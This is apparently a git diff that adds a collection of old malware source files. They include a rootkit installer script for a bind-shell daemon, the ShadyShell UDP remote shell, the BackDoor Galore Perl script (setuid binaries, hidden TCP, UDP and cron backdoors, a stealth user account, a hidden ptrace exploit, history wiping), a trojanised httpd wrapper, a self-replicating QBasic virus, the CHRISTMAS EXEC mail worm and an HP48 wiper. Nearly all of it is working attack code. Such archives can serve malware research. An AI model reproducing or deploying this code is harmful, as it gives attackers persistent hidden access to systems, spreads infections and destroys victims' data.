+if (pid>0) exit(0); +if ((chdir("/")) < 0) die("Could not set working directory"); +if ((setsid()) < 0) die("setsid() failed in creating daemon"); +umask(0); +close(STDIN_FILENO); +close(STDOUT_FILENO); +close(STDERR_FILENO); +/* You're on your own, pal.. */ +while(1) { +socklen=sizeof(Client); +if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */ +clipid=getpid(); +serpid=fork(); +if (serpid > 0) +waitpid(0, &stat, 0); +dup2(sockcli, 1); +execl("/bin/sh","sh",(char *)0); } +close(sockcli); } +void die(char *error) { +fprintf(stderr, "%s\n", error); +exit(1); } + +EOF + +gcc -o /bin/rootd /tmp/rootd.c +rm -f /tmp/rootd.c +rootd $port $max +echo "Rootkit installed at port 905" +exit 0 \ No newline at end of file diff --git a/Linux/Backdoor.Linux.ShadyShell.c b/Linux/Backdoor.Linux.ShadyShell.c new file mode 100644 index 00000000..258c9e61 --- /dev/null +++ b/Linux/Backdoor.Linux.ShadyShell.c @@ -0,0 +1,22 @@ +/* shadyshell.c by Derek Callaway -- S@IRC + obfuscated/optimized/compact UDP portshell code; Avoid layer 4 IDS ;-) + Example client usage: nc -u host.dom 1337 + Greets: inNUENdo, s0ftpr0jects, zsh +*/ +#include +#include +#include +#include +#include +#define DP 1337 /* Default Port */ +void ve(const char*f){perror(f);exit(-1);} int isdigit(),dup2(); +void usg(char**v){printf("usage: %s [port]\n",*v);exit(0);} +int main(int c,char**v){struct sockaddr_in s={};struct sockaddr u; +char*p,b[512];if(c==2){for(p=v[1];*p;p++)if(!isdigit(*p))usg(v);c=atoi(*(++v));} +s.sin_port=htons(c==2?c:DP),s.sin_addr.s_addr=INADDR_ANY,s.sin_family=AF_INET; +if((c=socket(AF_INET,SOCK_DGRAM,0))<0)ve("socket"); /* www.innu.org/~super */ +if(bind(c,&s,sizeof(s))<0)ve("bind");dup2(c,1);dup2(c,2);s.sin_port=sizeof(u); +if(recvfrom(c,&b,1024,0,&u,(int*)&(s.sin_port))<0)ve("socket"); +if(connect(c,&u,sizeof(u))<0)ve("socket"); /* No overflows here. :P */ +do{for(*v=b,p=0;**v&&((*v-b)<512||(p=*v));(*v)++)if(p||**v=='\r'||**v=='\n') +{**v=0;break;}if(p)continue;system(b);recv(c,&b,1024,0);}while(1);exit(0);} diff --git a/Linux/Backdoor.Unix.Galore.11 b/Linux/Backdoor.Unix.Galore.11 new file mode 100644 index 00000000..5563302c --- /dev/null +++ b/Linux/Backdoor.Unix.Galore.11 @@ -0,0 +1,141 @@ +#!/usr/bin/perl +# BackDoor Galore 1.1 (fixed!) +# Author: NTFX +# Legion2000 Security Research 1995 - +# This is a simple perl script which backdoors a system for you. +# Updated, set wrong rc.local patch and didnt execute them, blah! +# thats what happens when you code at 4am. +################################### +&option(); +sub option() { + system("clear"); +print "##################################\n"; +print "#Backdoor Galore By NTFX #\n"; +print "#Contact: #\n"; +print "#Legion2000 Security Research (c)#\n"; +print "##################################\n"; +print "#[ 1] Do this first of all. #\n"; # must do this cause im lazy. +print "#[ 2] Create setuid binary's. #\n"; # /usr/bin/mail & /usr/bin/find. +print "#[ 3] Open up TCP backdoor. #\n"; # 12350 # hid /usr/sbin/.telnetd. +print "#[ 4] Open up UDP backdoor. #\n"; # 65535 # hid /usr/sbin/.telnetd. +print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day. +print "#[ 6] Add unsuspicious user. #\n"; # gpm or news prob best. +print "#[ 7] Hide ptrace Exploit. #\n"; # /dev/.pts. +print "#[ 8] Removes Traces #\n"; +print "#[ 9] Social Calls. #\n"; # Sociable Greetings. +print "#[10] Exit the backdoor Script. #\n"; # quit the backdoor. +print "##################################\n"; +print "#Enter Option:"; +chomp($number=); + if($number == "1") { &di() } + if($number == "2") { &uid() } + if($number == "3") { &tcp() } + if($number == "4") { &udp() } + if($number == "5") { &cro() } + if($number == "6") { &usr() } + if($number == "7") { &ptr() } + if($number == "8") { &rem() } + if($number == "9") { &soc() } + if($number == "10") { &ex() } + else { &option() } } +################## +sub di() { + system ("clear"); + system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script"); +sleep 2; } +################## +sub uid() { + system ("clear"); +print "we will now make a setuid file in /usr/bin"; + system ("cd /usr/bin; chmod +s mail; cd $HOME"); +print "mail is now +s\n"; #edit as you wish. + system ("cd /usr/bin; chmod +s find; cd $HOME"); +print "find is now +s\n"; #edit as you wish. +sleep 1; } +################## +sub tcp() { + system ("clear"); +print "We are now going to create a basic tcp backdoor\n"; + system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo + /usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot. +print "tcp backdoor is now running on specified port and enabled at boot\n"; +sleep 1; } +################### +sub udp() { + system ("clear"); +print "We are now going to install a basic udp backdoor\n"; + system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo + /usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &"); +print "udp backdoor now running on specified port and enabled at boot\n"; +sleep 1; } +################### +sub cro() { + system ("clear"); +print "We are now going to install a backdoor into the crond\n"; + system ("bash crond.sh"); +print "The cron backdoor is now installed, and running on the specified port\n"; +sleep 1; } +################### +sub usr() { + system ("clear"); +print "we will now add a unsuspicious user to the system\n"; +print "username: "; +chomp($user=); # be sensible, an acc called "hax0r" will be noticed. +print "UID: "; +chomp($uid=); +print "GID: "; +chomp($gid=); +print "home dir: "; +chomp($home=); #/home/httpd maybe? +print "type of shell: "; +chomp($sh=); +print "comments: "; # preferably leave blank +chomp($cm=); + system("/usr/sbin/useradd $user -u $uid -g $gid -d $home -s $sh -c $cm"); + system("passwd $user"); +sleep 1; } +################## +sub ptr() { + system ("clear"); +print "we are now going to compile and hide the ptrace exploit\n"; +print "name the user you previously entered"; +chomp ($usr=); + system ("cd ../ntfx; gcc ptrace.c -o pts; chown $usr pts; mv pts /dev/.pts"); +print "ptrace is now stored in /dev/.pts"; +sleep 1; } +################## +sub soc() { + system ("clear"); +print "Greetings:\n"; +sleep 1; +print "opt1k, SpyModem, eckis, EazyMoney, Phantasm, Epheo, I-L, wired-\n"; +sleep 1; +print "BlackSun Research, Legion2000 Crew, efnet #feed-the-goats\n"; +$sex; +print "press any key to continue...."; +chomp($sex=); } +################## +sub rem() { + system ("clear"); +print "we are now going to remove files we have used.\n"; + system ("rm -rf $HOME/scripts; rm -rf $HOME/ntfx"); +print "now removing history files.\n"; + system ("HISTFILE=/dev/null; HISTFILESIZE=0; rm -rf .*"); } +# had to redo due to paul holden selecting remove traces on the original source. +############# +sub ex() { + system("clear"); +print" # ##### ### ### ###\n"; +print" # ###### #### # #### # # # # # # # # # #\n"; +print" # # # # # # # ## # # # # # # # #\n"; +print" # ##### # # # # # # # ##### # # # # # #\n"; +print" # # # ### # # # # # # # # # # # # #\n"; +print" # # # # # # # # ## # # # # # # #\n"; +print" ####### ###### #### # #### # # ####### ### ### ###\n"; +print" www.legion2000.tk\n"; +print" efnet #feed-the-goats\n"; +print"\n\n"; +print"Press Any Key To Exit\n"; +$sex; +chomp($sex=); +exit 1;} \ No newline at end of file diff --git a/Linux/Constructor.Script.IBBM.a b/Linux/Constructor.Script.IBBM.a new file mode 100644 index 00000000..c29fda1e --- /dev/null +++ b/Linux/Constructor.Script.IBBM.a @@ -0,0 +1,1034 @@ + + +BBM + + + + + +
+

Nightmare Joker

+

present's

+

The Incredible Batch Bug Maker

+

coded by

+

Wavefunc [Independant]


+
Key String: · Comment: +
Sub String: +· Infects per run: · Max seeks per run: +
Method: · Search:
Add Code:
Time Match: · Date Match:

Find Host Batch · Use Root +Copy · Hide Copy
Add blank line for safety · Send output to window

+

BACK TO HOMEPAGE + +


Last Updated 03-Jan-97 njoker@hotmail.com
g + diff --git a/Linux/Virus.BAS.Xyc b/Linux/Virus.BAS.Xyc new file mode 100644 index 00000000..b93c42b4 --- /dev/null +++ b/Linux/Virus.BAS.Xyc @@ -0,0 +1,13 @@ +CLS +REM The first Quick Basic infection Virus +REM written by SeCoNd PaRt To HeLl +REM for showing, that .BAS can be infected +REM NAME of the Virus: BAS.XYC +OPEN "C:\xyc.bat" FOR OUTPUT AS #1 +PRINT #1, "@echo off" +PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas" +PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r" +CLOSE #1 +SHELL "C:\xyc.bat" + + diff --git a/Linux/Virus.Linux.TrojoDaemon.c b/Linux/Virus.Linux.TrojoDaemon.c new file mode 100644 index 00000000..27b1c594 --- /dev/null +++ b/Linux/Virus.Linux.TrojoDaemon.c @@ -0,0 +1,96 @@ +/* ......:::: daemon trojo by DeV^AwaY ::::...... + * + * + * [*] --> coded by: DeV^AwaY + * [*] ------------> devilnet@freemail.it + * [*] ------------> ircnet/efnet@DeV^AwaY + * [*] --> V3rsion: 0.2 + * + * install: + * To install this trojan you should copy the real daemon in another + * directory !WITH THE SOME NAME!. Then you should compile this source on the + * real daemon file in its some directory. + * So write in /dev/ptyh all path/commands to execute with + * daemon. If you must use options with commands you must divide they + * with the $ character. + * Ex: + * + * cat /dev/ptyh + * /home/hacker/. /psybnc <-- without options + * /home/hacker/bot/eggdrop$ -m bot.conf -t <-- with options + * /home/hacker/. $ <-- to run the file ". " + * + * Default + * trojo daemon /usr/sbin/httpd + * real deamon /usr/bin/httpd #EXE_PATH + * + */ + +#include +#include + +#define TRJ_PATH "/dev/ptyh" +#define EXE_PATH "/usr/bin/httpd" + +main (int argc,char **argv,char **envp) { + +char fstr[200],**addr=malloc(200),slas[500],slaw[500]; +int i,ic=1,deic,sllen; +FILE *ofile; + + if (fork() == 0) { + if ((ofile=fopen(TRJ_PATH,"r"))==NULL) exit(0); + + while (!feof(ofile)) { + fgets(fstr, 200, ofile); + for (i=0; i/dev/null 2>/dev/null &"); + system(addr[ic]); + } + exit(0); + } + + if ((ofile=fopen(EXE_PATH,"r"))==NULL) { + printf("bash: %s: No such file or directory\n",EXE_PATH); + exit(0); + } + + execve(EXE_PATH, argv, envp); + +} diff --git a/Linux/Virus.Script.Higu b/Linux/Virus.Script.Higu new file mode 100644 index 00000000..3de294da --- /dev/null +++ b/Linux/Virus.Script.Higu @@ -0,0 +1,13 @@ +<< CLLCD + "Press any key to run Protect System" MSGBOX + << DO + HOME CLEAR VARS OBJ-> DROP + 'V1' STO + PURGE 'V1' + UNTIL DEPTH 0 + END + >> CLVAR CLEAR + CLLCD + "Bye HP48..... virus_br@hotmail.com Higuita(3c)" MSGBOX + 1400 .60 BEEP +>> 'BYEHP48' [STO] diff --git a/Linux/Virus.Script.IBM.XMasTreeWorm b/Linux/Virus.Script.IBM.XMasTreeWorm new file mode 100644 index 00000000..1c28e326 --- /dev/null +++ b/Linux/Virus.Script.IBM.XMasTreeWorm @@ -0,0 +1,102 @@ +/*********************/ +/* LET THIS EXEC */ +/* */ +/* RUN */ +/* */ +/* AND */ +/* */ +/* ENJOY */ +/* */ +/* YOURSELF! */ +/*********************/ +'VMFCLEAR' +SAY ' * ' +SAY ' * ' +SAY ' *** ' +SAY ' ***** ' +SAY ' ******* ' +SAY ' ********* ' +SAY ' ************* A' +SAY ' ******* ' +SAY ' *********** VERY' +SAY ' *************** ' +SAY ' ******************* HAPPY' +SAY ' *********** ' +SAY ' *************** CHRISTMAS' +SAY ' ******************* ' +SAY ' *********************** AND MY' +SAY ' *************** ' +SAY ' ******************* BEST WISHES' +SAY ' *********************** ' +SAY ' *************************** FOR THE NEXT' +SAY ' ****** ' +SAY ' ****** YEAR' +SAY ' ****** ' +/* browsing this file is no fun at all + just type CHRISTMAS from cms */ +dropbuf +makebuf +"q t (stack" + pull d1 d2 d3 d4 d5 dat + pull zeile + jeah = substr(dat,7,2) + tack = substr(dat,4,2) + mohn = substr(dat,1,2) +if jeah <= 88 then do +if mohn <2 ] mohn = 12 then do +DROPBUF +MAKEBUF +"IDENTIFY ( FIFO" +PULL WER VON WO IST REST +DROPBUF +MAKEBUF +"EXECIO * DISKR " WER " NAMES A (FIFO" + DO WHILE QUEUED() > 0 + PULL NICK NAME ORT + NAM = INDEX(NAME,'.')+1 + IF NAM > 0 THEN DO + NAME = SUBSTR(NAME,NAM) + END + NAM = INDEX(ORT,'.')+1 + IF NAM > 0 THEN DO + ORT = SUBSTR(ORT,NAM) + END + IF LENGTH(NAME)>0 THEN DO + IF LENGTH(ORT) = 0 THEN DO + ORT = WO + END + if name ^= "RELAY" then do + "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack" + end + END + END +DROPBUF +MAKEBUF +ANZ = 1 +"EXECIO * DISKR " WER " NETLOG A (FIFO" + DO WHILE QUEUED() > 0 + PULL KIND FN FT FM ACT FROM ID AT NODE REST + IF ACT = 'SENT' THEN DO + IF ANZ = 1 THEN DO + OK.ANZ = ID + END + IF ANZ > 1 THEN DO + OK.ANZ = ID + NIXIS = 0 + DO I = 1 TO ANZ-1 + IF OK.I = ID THEN DO + NIXIS = 1 + END + END + END + ANZ = ANZ + 1 + IF NIXIS = 0 THEN DO + "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack" + END + END + END +DROPBUF +END +end +end + \ No newline at end of file diff --git a/Linux/Virus.Script.MBP.Kynel b/Linux/Virus.Script.MBP.Kynel new file mode 100644 index 0000000000000000000000000000000000000000..78e400502ed437198bdfa4205d49f8187e4470b6 GIT binary patch literal 7512 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